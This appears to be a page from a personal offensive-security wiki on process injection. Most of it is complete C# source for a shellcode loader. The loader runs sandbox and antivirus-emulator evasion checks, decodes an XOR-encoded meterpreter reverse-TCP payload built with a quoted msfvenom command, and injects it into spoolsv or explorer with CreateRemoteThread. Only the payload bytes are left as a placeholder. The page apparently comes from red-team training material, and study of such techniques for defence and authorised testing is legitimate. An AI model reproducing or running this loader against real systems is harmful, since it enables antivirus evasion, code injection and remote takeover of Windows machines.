AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page

Was this helpful?

  1. Offensive Cyberz
  2. Defense Evasion
  3. Evade Heuristic Behaviors

Process Injection

PreviousEvade Heuristic BehaviorsNextProcess Hollowing

Last updated 3 years ago

Was this helpful?

There are a few reasons you may want to inject your shellcode into another process. • Extend the life of a beacon into a process that is unlikely to terminate • Live in a process that isn't blocked by host firewall rules

General Process injection steps: • Dropper with Shellcode • Allocate memory in target process • Copy shellcode onto target • Execute shellcode

Templates from:

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;







namespace non_emulated

{



    public class Program

    {

        public const uint EXECUTEREADWRITE = 0x40;

        public const uint COMMIT_RESERVE = 0x3000;

        [Flags]

        public enum ProcessAccessFlags : uint

        {

            All = 0x001F0FFF

        }

        [Flags]

        public enum AllocationType

        {

            Commit = 0x1000,

            Reserve = 0x2000

        }



        [Flags]

        public enum MemoryProtection

        {

            ExecuteReadWrite = 0x40

        }

        [DllImport("kernel32.dll")]

        static extern void Sleep(uint dwMilliseconds);



        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);



        [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]

        private unsafe static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, uint lpThreadId);



        [DllImport("kernel32.dll", SetLastError = true)]

        public static extern Int32 WaitForSingleObject(IntPtr Handle, Int32 Wait);

        [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        [System.Runtime.InteropServices.DllImport("kernel32.dll")]

        static extern IntPtr GetCurrentProcess();

        [DllImport("kernel32.dll", SetLastError = true)]

        static extern UInt32 FlsAlloc(IntPtr callback);

        static bool IsElevated

        {

            get

            {

                return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);

            }

        }

        [DllImport("kernel32.dll", SetLastError = true)]

        public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);



        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);



        [DllImport("kernel32.dll", SetLastError = true)]

        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);



        [DllImport("kernel32.dll")]

        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);





        public static void Main(string[] args)

        {

            DateTime t1 = DateTime.Now;

            Sleep(2000);

            double t2 = DateTime.Now.Subtract(t1).TotalSeconds;

            //we can inject a two-second delay, and if the time

            //checks indicate that two seconds have not passed during the instruction, we assume we are

            //running in a simulator and can simply exit before any suspect code is run

            if (t2 < 1.5)

            {

                return;

            }

            //If the API is not emulated and the code is run by the AV emulator, it will not return a valid address.

            //In this case, we simply exit from the application without performing any malicious actions, similar

            //to the implementation using Sleep.

            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);

            if (mem == null)

            {

                return;

            }

            //some AV emulators will return a failing condition when FlSAlloc is called

            UInt32 Fls = FlsAlloc(IntPtr.Zero);

            if (Fls == 0xFFFFFFFF)

            {

                return;

            }

            // additional AV evasion can be found here: https://githubmemory.com/repo/cinzinga/Evasion-Practice



            // Xor-encoded payload, key 0xfa

            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.X.Y LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key J

             byte[] buf = new byte[803] {
 PAYLOAD };







            int len = buf.Length;

            String procName = "";

            // Parse arguments, if given (process to inject)

            if (IsElevated)

            {

                Console.WriteLine("Process is elevated.");

                procName = "spoolsv";

            }

            else

            {

                Console.WriteLine("Process is not elevated.");

                procName = "explorer";

            }





            Console.WriteLine($"Attempting to inject into {procName} process...");



            // Get process IDs

            Process[] expProc = Process.GetProcessesByName(procName);



            // If multiple processes exist, try to inject in all of them

            for (int i = 0; i < expProc.Length; i++)

            {

                int pid = expProc[i].Id;



                // Get a handle on the process

                IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);

                if ((int)hProcess == 0)

                {

                    Console.WriteLine($"Failed to get handle on PID {pid}.");

                    continue;

                }

                Console.WriteLine($"Got handle {hProcess} on PID {pid}.");



                // Allocate memory in the remote process

                IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);

                Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process.");



                // Decode the payload

                for (int j = 0; j < buf.Length; j++)

                {

                    buf[j] = (byte)((uint)buf[j] ^ 0x4a);

                }



                // Write the payload to the allocated bytes

                IntPtr bytesWritten;

                bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);

                Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult}).");



                IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);

                Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!");

                break;

            }

        }

    }

}

https://github.com/chvancooten/OSEP-Code-Snippets